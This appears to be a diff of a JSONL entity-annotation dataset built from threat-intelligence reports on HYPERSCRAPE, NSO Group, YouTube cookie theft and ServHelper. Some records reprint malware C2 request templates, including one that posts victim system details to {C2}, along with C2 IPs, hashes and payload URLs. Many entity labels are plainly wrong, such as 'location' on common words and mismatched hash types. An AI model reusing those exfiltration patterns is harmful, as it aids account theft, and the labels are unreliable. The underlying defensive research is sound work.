websites.","entities":[{"id":25548,"label":"identity","start_offset":10,"end_offset":14},{"id":25549,"label":"location","start_offset":15,"end_offset":19},{"id":25550,"label":"location","start_offset":86,"end_offset":89}],"relations":[],"Comments":[]} -{"id":8288,"text":" Figure 2. Stolen credit cards (Click to enlarge)","entities":[],"relations":[],"Comments":[]} -{"id":8289,"text":"This threat actor first published stolen documents in April 2016.","entities":[],"relations":[],"Comments":[]} -{"id":8290,"text":"His motives remain unclear since the documents themselves did not contain any particularly unusual information.","entities":[],"relations":[],"Comments":[]} -{"id":8295,"text":"Indicators of CompromiseFiles with the following hashes were used in the first series of attacks: cd8329f75b1393ead3e16c6c79ee1ab476e6487370481e5931feb63305f00983 – detected as VBS_KEYLOG.NYKW f46f0e8eed0361294200d64e87b3fb13f6a3797f99f5b588444534f27612a590 – archive file;","entities":[{"id":25565,"label":"SHA1","start_offset":99,"end_offset":163},{"id":25566,"label":"MD5","start_offset":194,"end_offset":258}],"relations":[],"Comments":[]} -{"id":8296,"text":"contents detected as VBS_KEYLOG.NYKW fd883a978dd6d95fa5c3b5e0a154e0e07b06e7cb6c685f1ca9f58c73122df24d – archive file; contents detected as VBS_KEYLOG.NYKW 7413c7c0317e49e49d595408f721c2ab2f120215374accf2f8133c9d9ad603fb – detected as WORM_DUNIHI.AUSHH 89427241e26748949c235fc43805c72960d9c2711fa72036c33137648bb475fa – detected as VBS_REMCOS.B","entities":[{"id":25567,"label":"SHA1","start_offset":37,"end_offset":101},{"id":25568,"label":"SHA2","start_offset":155,"end_offset":219},{"id":25569,"label":"SHA2","start_offset":252,"end_offset":316}],"relations":[],"Comments":[]} -{"id":8297,"text":"Files with the following hashes were used in the second series of attacks: fb5b5906feab268f90789b15351b8a193fb5f445a3ae9afb1da8fb814ed80325 – detected as VBS_KEYLOG.NYKW 306f4f843c5a5a119a3385ad2b18c78a04fac618031ddecabf0633083a6c9a76 – detected as VBS_KEYLOG.NYKW 33709ca050fd0abc2aba38326996bf1c3b6d9b875228c9f15e624f9002c199a8 – detected as VBS_OBFUS.VUJ ff0f9057d3da7b3500f145ce24670c89a93cdb5cbe74946b17397fc466ddfbda – detected as VBS_AUTORUN.ASUHK 9b7cc8f4807df162f99f5fa592bc7cc5c6a756d9c0311c7b2529f19a0ac59c1a – archive file; contents detected as VBS_OBFUS.VUK 587e38fb11bd0c4021ce6965e92838521616ee4c5506ef0fa160452e9c71d5cf – detected as VBS_OBFUS.VUK Tags APT & Targeted Attacks | Malware | Research | Articles, News, Reports","entities":[{"id":25570,"label":"SHA2","start_offset":76,"end_offset":140},{"id":25571,"label":"SHA2","start_offset":171,"end_offset":235},{"id":25572,"label":"SHA1","start_offset":266,"end_offset":330},{"id":25573,"label":"MD5","start_offset":359,"end_offset":423},{"id":25574,"label":"SHA1","start_offset":456,"end_offset":520},{"id":25575,"label":"SHA1","start_offset":572,"end_offset":636},{"id":25576,"label":"location","start_offset":679,"end_offset":682}],"relations":[],"Comments":[]} -{"id":8301,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":25593,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":25594,"label":"location","start_offset":57,"end_offset":61},{"id":25598,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} -{"id":8302,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[],"relations":[],"Comments":[]} -{"id":8303,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} -{"id":8307,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":25616,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":25617,"label":"location","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} -{"id":8308,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":25618,"label":"location","start_offset":5,"end_offset":9},{"id":25620,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} -{"id":8309,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[],"relations":[],"Comments":[]} -{"id":8316,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[],"relations":[],"Comments":[]} -{"id":8319,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} -{"id":8320,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":25649,"label":"URL","start_offset":4,"end_offset":28}],"relations":[],"Comments":[]} -{"id":8322,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} -{"id":8324,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} -{"id":8326,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} -{"id":8327,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":25655,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} -{"id":8331,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} -{"id":8332,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} -{"id":8334,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[{"id":25665,"label":"malware","start_offset":64,"end_offset":68},{"id":25666,"label":"location","start_offset":82,"end_offset":85},{"id":25667,"label":"location","start_offset":99,"end_offset":102},{"id":25668,"label":"location","start_offset":112,"end_offset":117},{"id":25669,"label":"location","start_offset":157,"end_offset":161},{"id":25670,"label":"location","start_offset":192,"end_offset":196}],"relations":[],"Comments":[]} -{"id":8335,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[],"relations":[],"Comments":[]} -{"id":8336,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} -{"id":8337,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[],"relations":[],"Comments":[]} -{"id":8339,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} -{"id":8342,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":25679,"label":"location","start_offset":0,"end_offset":4},{"id":25680,"label":"URL","start_offset":5,"end_offset":44},{"id":25682,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} -{"id":8345,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} -{"id":8346,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} -{"id":8348,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} -{"id":8349,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} -{"id":8355,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[{"id":25708,"label":"location","start_offset":0,"end_offset":6},{"id":25709,"label":"malware","start_offset":7,"end_offset":11}],"relations":[],"Comments":[]} -{"id":8359,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} -{"id":8361,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} -{"id":8365,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[{"id":25737,"label":"tools","start_offset":70,"end_offset":76},{"id":25738,"label":"location","start_offset":77,"end_offset":80},{"id":25739,"label":"location","start_offset":81,"end_offset":89},{"id":25740,"label":"location","start_offset":112,"end_offset":115},{"id":25741,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} -{"id":8367,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":25746,"label":"IPV4","start_offset":4,"end_offset":18},{"id":25747,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":8368,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":25748,"label":"SHA2","start_offset":0,"end_offset":64},{"id":25749,"label":"SHA1","start_offset":65,"end_offset":129},{"id":25750,"label":"SHA1","start_offset":130,"end_offset":194},{"id":25751,"label":"MD5","start_offset":195,"end_offset":259},{"id":25752,"label":"SHA2","start_offset":260,"end_offset":324},{"id":25753,"label":"SHA2","start_offset":325,"end_offset":389},{"id":25754,"label":"SHA2","start_offset":390,"end_offset":454},{"id":25755,"label":"SHA2","start_offset":455,"end_offset":519},{"id":25756,"label":"identity","start_offset":520,"end_offset":529},{"id":25757,"label":"MD5","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} -{"id":8369,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[],"relations":[],"Comments":[]} -{"id":8370,"text":"It was last updated on July 29, 2022.","entities":[],"relations":[],"Comments":[]} -{"id":8378,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[{"id":25792,"label":"tools","start_offset":48,"end_offset":54},{"id":25793,"label":"location","start_offset":55,"end_offset":58},{"id":25794,"label":"location","start_offset":59,"end_offset":67},{"id":25795,"label":"location","start_offset":84,"end_offset":87},{"id":25796,"label":"location","start_offset":121,"end_offset":129}],"relations":[],"Comments":[]} -{"id":8381,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[{"id":25803,"label":"location","start_offset":0,"end_offset":3},{"id":25804,"label":"identity","start_offset":13,"end_offset":17},{"id":25805,"label":"location","start_offset":23,"end_offset":31},{"id":25806,"label":"location","start_offset":101,"end_offset":104}],"relations":[],"Comments":[]} -{"id":8386,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} -{"id":8388,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[],"relations":[],"Comments":[]} -{"id":8389,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[],"relations":[],"Comments":[]} -{"id":8391,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[],"relations":[],"Comments":[]} -{"id":8412,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} -{"id":8420,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} -{"id":8424,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[{"id":25947,"label":"tools","start_offset":67,"end_offset":73},{"id":25948,"label":"location","start_offset":116,"end_offset":124},{"id":25950,"label":"location","start_offset":193,"end_offset":196},{"id":25951,"label":"location","start_offset":241,"end_offset":247}],"relations":[],"Comments":[]} -{"id":8425,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[{"id":25953,"label":"malware","start_offset":83,"end_offset":90},{"id":25954,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} -{"id":8426,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[{"id":25955,"label":"location","start_offset":61,"end_offset":69},{"id":25956,"label":"location","start_offset":70,"end_offset":78},{"id":25957,"label":"threat-actor","start_offset":105,"end_offset":109},{"id":25958,"label":"location","start_offset":110,"end_offset":113},{"id":25959,"label":"location","start_offset":130,"end_offset":135}],"relations":[],"Comments":[]} -{"id":8431,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":25979,"label":"threat-actor","start_offset":28,"end_offset":38},{"id":25980,"label":"location","start_offset":59,"end_offset":62},{"id":25981,"label":"location","start_offset":95,"end_offset":98},{"id":25982,"label":"location","start_offset":105,"end_offset":109},{"id":25983,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} -{"id":8432,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":25986,"label":"location","start_offset":37,"end_offset":45},{"id":25987,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":25988,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} -{"id":8434,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[{"id":25991,"label":"location","start_offset":83,"end_offset":90},{"id":25992,"label":"attack-pattern","start_offset":177,"end_offset":183}],"relations":[],"Comments":[]} -{"id":8435,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[{"id":25993,"label":"location","start_offset":0,"end_offset":3},{"id":25994,"label":"attack-pattern","start_offset":28,"end_offset":36},{"id":25995,"label":"location","start_offset":37,"end_offset":40},{"id":25996,"label":"location","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} -{"id":8441,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":26012,"label":"location","start_offset":46,"end_offset":49},{"id":26013,"label":"attack-pattern","start_offset":55,"end_offset":61},{"id":26014,"label":"location","start_offset":73,"end_offset":76},{"id":26015,"label":"location","start_offset":97,"end_offset":105}],"relations":[],"Comments":[]} -{"id":8442,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":26016,"label":"tools","start_offset":28,"end_offset":34},{"id":26017,"label":"location","start_offset":35,"end_offset":38},{"id":26018,"label":"location","start_offset":61,"end_offset":64},{"id":26020,"label":"location","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} -{"id":8455,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":26060,"label":"location","start_offset":10,"end_offset":16},{"id":26061,"label":"malware","start_offset":69,"end_offset":78},{"id":26062,"label":"location","start_offset":86,"end_offset":89},{"id":26063,"label":"attack-pattern","start_offset":139,"end_offset":147}],"relations":[],"Comments":[]} -{"id":8457,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} -{"id":8465,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[{"id":26102,"label":"location","start_offset":45,"end_offset":51},{"id":26103,"label":"location","start_offset":57,"end_offset":63},{"id":26104,"label":"location","start_offset":76,"end_offset":80},{"id":26105,"label":"location","start_offset":101,"end_offset":114},{"id":26106,"label":"location","start_offset":115,"end_offset":121},{"id":26107,"label":"location","start_offset":122,"end_offset":125},{"id":26108,"label":"tools","start_offset":154,"end_offset":160}],"relations":[],"Comments":[]} -{"id":8468,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} -{"id":8479,"text":"With so much diversity in the attack surface, it’s important to leverage security best practices to manage your cyber risk.","entities":[{"id":26146,"label":"location","start_offset":8,"end_offset":12},{"id":26147,"label":"malware","start_offset":64,"end_offset":72},{"id":26148,"label":"location","start_offset":73,"end_offset":81},{"id":26149,"label":"location","start_offset":82,"end_offset":86},{"id":26150,"label":"location","start_offset":100,"end_offset":106}],"relations":[],"Comments":[]} -{"id":8484,"text":"Get advice here: https:\/\/success.trendmicro.com","entities":[],"relations":[],"Comments":[]} -{"id":8488,"text":"Pay close attention to unrecognized network traffic (both inbound and outbound) and watch for sophisticated new phishing attacks.","entities":[{"id":26173,"label":"location","start_offset":66,"end_offset":69},{"id":26174,"label":"location","start_offset":80,"end_offset":83},{"id":26175,"label":"attack-pattern","start_offset":112,"end_offset":120}],"relations":[],"Comments":[]} -{"id":8490,"text":"Where possible, reduce your attack surface.","entities":[],"relations":[],"Comments":[]} -{"id":8492,"text":"How to do that?","entities":[],"relations":[],"Comments":[]} -{"id":8495,"text":" Our research teams and threat hunters will work vigilantly to monitor and identify any new threat intelligence and will continue to share updates here: trendmicro.com\/ukrainecrisis.","entities":[{"id":26196,"label":"location","start_offset":22,"end_offset":25},{"id":26197,"label":"location","start_offset":33,"end_offset":40},{"id":26198,"label":"location","start_offset":41,"end_offset":45},{"id":26199,"label":"location","start_offset":65,"end_offset":72},{"id":26200,"label":"location","start_offset":73,"end_offset":76},{"id":26201,"label":"location","start_offset":114,"end_offset":117},{"id":26202,"label":"location","start_offset":118,"end_offset":122},{"id":26203,"label":"URL","start_offset":155,"end_offset":183}],"relations":[],"Comments":[]} -{"id":8496,"text":"This blog has been revised to include new facts that have been released since the original posting.","entities":[],"relations":[],"Comments":[]} -{"id":8497,"text":" Tags Cloud | Cyber Crime | Exploits & Vulnerabilities | Expert Perspective | Phishing | Cyber Threats | APT & Targeted Attacks | Endpoints | Mobile | Articles, News, Reports","entities":[{"id":26204,"label":"location","start_offset":10,"end_offset":15},{"id":26205,"label":"attack-pattern","start_offset":82,"end_offset":90},{"id":26206,"label":"location","start_offset":109,"end_offset":112},{"id":26207,"label":"location","start_offset":146,"end_offset":152}],"relations":[],"Comments":[]} -{"id":8501,"text":"This is the second directive the TSA issued to the pipeline sector this 2021, building on the initial Security Directive released on May 2021 following the ransomware attack on Colonial Pipeline by DarkSide.","entities":[],"relations":[],"Comments":[]} -{"id":8511,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":26275,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} -{"id":8512,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[{"id":26277,"label":"location","start_offset":23,"end_offset":31},{"id":26279,"label":"location","start_offset":113,"end_offset":117},{"id":26280,"label":"location","start_offset":124,"end_offset":130},{"id":26281,"label":"tools","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} -{"id":8513,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":26286,"label":"location","start_offset":85,"end_offset":88},{"id":26288,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} -{"id":8514,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":26294,"label":"location","start_offset":52,"end_offset":56},{"id":26295,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":26296,"label":"location","start_offset":75,"end_offset":79},{"id":26299,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} -{"id":8516,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[],"relations":[],"Comments":[]} -{"id":8518,"text":"Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":26311,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} -{"id":8522,"text":"The phishing typically started with a customized email introducing the company and its products.","entities":[{"id":26318,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":26319,"label":"location","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} -{"id":8523,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":26320,"label":"location","start_offset":9,"end_offset":15},{"id":26321,"label":"location","start_offset":30,"end_offset":34},{"id":26322,"label":"location","start_offset":46,"end_offset":53},{"id":26323,"label":"location","start_offset":54,"end_offset":58},{"id":26325,"label":"location","start_offset":141,"end_offset":144},{"id":26327,"label":"attack-pattern","start_offset":193,"end_offset":201}],"relations":[],"Comments":[]} -{"id":8528,"text":"During the pandemic, we also uncovered attackers posing as news providers with a “Covid19 news software.”","entities":[],"relations":[],"Comments":[]} -{"id":8531,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":26348,"label":"location","start_offset":32,"end_offset":35},{"id":26349,"label":"attack-pattern","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} -{"id":8536,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.","entities":[{"id":26372,"label":"malware","start_offset":79,"end_offset":86},{"id":26379,"label":"location","start_offset":161,"end_offset":164}],"relations":[],"Comments":[]} -{"id":8537,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":26383,"label":"attack-pattern","start_offset":5,"end_offset":11},{"id":26385,"label":"location","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} -{"id":8541,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} -{"id":8545,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} -{"id":8549,"text":"Our recommendations: Additional resources: Avoid & Report Phishing Emails.","entities":[{"id":26413,"label":"attack-pattern","start_offset":58,"end_offset":66}],"relations":[],"Comments":[]} -{"id":8550,"text":"Related Malware hashes: Top Phishing Domains:","entities":[{"id":26414,"label":"attack-pattern","start_offset":28,"end_offset":36}],"relations":[],"Comments":[]} -{"id":8552,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":26417,"label":"location","start_offset":10,"end_offset":14},{"id":26418,"label":"location","start_offset":89,"end_offset":95},{"id":26419,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} -{"id":8556,"text":"On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[],"relations":[],"Comments":[]} -{"id":8558,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":26438,"label":"location","start_offset":37,"end_offset":41},{"id":26442,"label":"attack-pattern","start_offset":181,"end_offset":189}],"relations":[],"Comments":[]} -{"id":8561,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":26452,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":26454,"label":"location","start_offset":64,"end_offset":74},{"id":26455,"label":"location","start_offset":78,"end_offset":82},{"id":26456,"label":"attack-pattern","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} +{"id":10475,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":31852,"label":"location","start_offset":144,"end_offset":148},{"id":31854,"label":"location","start_offset":236,"end_offset":239},{"id":31855,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} +{"id":13984,"text":"In the same way that the kill chain has become an outdated concept, so has the notion that EDR is sufficient to speed up detection and response by solely using the endpoint.","entities":[{"id":48774,"label":"SOFTWARE","start_offset":91,"end_offset":95}],"relations":[],"Comments":[]} +{"id":13618,"text":"Figure 14.","entities":[],"relations":[],"Comments":[]} +{"id":13676,"text":"X-Mailer: CommuniGate Pro WebUser v5.3.2","entities":[],"relations":[],"Comments":[]} +{"id":10197,"text":"The following screenshot is an example of a fake page where the original URL is replaced with one leading to a cookie theft malware download.","entities":[{"id":31138,"label":"tools","start_offset":49,"end_offset":53},{"id":31139,"label":"location","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} +{"id":7678,"text":"Just like in previous operations, they continue to make small changes, such as targeting other countries, entities, or the combination of techniques used for deployment, for each campaign.","entities":[{"id":23878,"label":"identity","start_offset":0,"end_offset":4},{"id":23879,"label":"location","start_offset":56,"end_offset":61},{"id":23880,"label":"location","start_offset":179,"end_offset":187}],"relations":[],"Comments":[]} +{"id":728,"text":"OMI is used by Microsoft Azure to manage UNIX packages within Azure virtual machines (VMs), containers and serverless cloud instances.","entities":[{"id":46302,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":46305,"label":"SOFTWARE","start_offset":62,"end_offset":90},{"id":46303,"label":"SOFTWARE","start_offset":15,"end_offset":30},{"id":46304,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} +{"id":9643,"text":" Figure 5. Hardcoded RSA256 key showing the first 20 characters","entities":[],"relations":[],"Comments":[]} +{"id":2785,"text":"The attacker steals the victims computing resources and translates it into a cryptocurrency like Bitcoin.","entities":[{"id":48011,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} +{"id":7737,"text":"Meanwhile, the .DOC VBA macros retrieves the MSI files from hxxp:\/\/195.123.245.185\/km or hxxp:\/\/185.225.17.5\/km, which executes the NSIS installer for ServHelper installation.","entities":[{"id":24031,"label":"malware","start_offset":132,"end_offset":136},{"id":24032,"label":"tools","start_offset":151,"end_offset":161}],"relations":[],"Comments":[]} +{"id":21,"text":"Attacks aren't getting any less sophisticated, so it is time to leave legacy security solutions behind and upgrade to real, prevention-based security.","entities":[],"relations":[],"Comments":[]} +{"id":10579,"text":"APP provides the strongest protections available against phishing and account hijacking and is specifically designed for the highest-risk accounts.","entities":[{"id":32265,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":32266,"label":"location","start_offset":66,"end_offset":69},{"id":32267,"label":"location","start_offset":88,"end_offset":91}],"relations":[],"Comments":[]} +{"id":9335,"text":"We first came across the threat in May on the site http:\/\/gooogle[.]press\/, which was advertising a chat app called \u201cChatrious.\u201d","entities":[{"id":28812,"label":"URL","start_offset":51,"end_offset":74},{"id":28813,"label":"location","start_offset":100,"end_offset":104}],"relations":[],"Comments":[]} +{"id":3059,"text":"If the user clicks the \u201cUpdate to Full Protection\u201d button they will be prompted to subscribe to a service that costs $4.99 (US) per month through In-App Purchase of Google Play (Figure 3). Figure 3","entities":[],"relations":[],"Comments":[]} +{"id":12352,"text":"This targeting is consistent with what others have subsequently reported.","entities":[],"relations":[],"Comments":[]} +{"id":10654,"text":"To protect enterprises against malicious activities, we need more than just timely patches.","entities":[{"id":32524,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} +{"id":5047,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51131,"label":"identity","start_offset":23,"end_offset":26},{"id":51132,"label":"attack-pattern","start_offset":106,"end_offset":134}],"relations":[],"Comments":[]} +{"id":12874,"text":"Lateral Movement: Moving in for the Kill","entities":[],"relations":[],"Comments":[]} +{"id":4962,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[{"id":50984,"label":"SOFTWARE","start_offset":62,"end_offset":75},{"id":50985,"label":"SOFTWARE","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} +{"id":102,"text":"They have focused most of their efforts on planting crypto-mining malware on cloud servers in an effort to mine Monero coins, but we have also seen them utilize DDoS IRC bots, steal cloud account credentials, and exfil data.","entities":[{"id":44594,"label":"SOFTWARE","start_offset":112,"end_offset":118},{"id":44595,"label":"attack-pattern","start_offset":161,"end_offset":165},{"id":44596,"label":"attack-pattern","start_offset":176,"end_offset":207},{"id":44597,"label":"attack-pattern","start_offset":213,"end_offset":223},{"id":44598,"label":"malware","start_offset":52,"end_offset":73}],"relations":[],"Comments":[]} +{"id":14028,"text":"The image (Figure 3) taken from an analysis of Freenki shows that the same logic applies when the resource is compiled into the binary.","entities":[{"id":47194,"label":"malware","start_offset":47,"end_offset":55}],"relations":[],"Comments":[]} +{"id":354,"text":"TrustedSec reports on how attackers were apparently able to 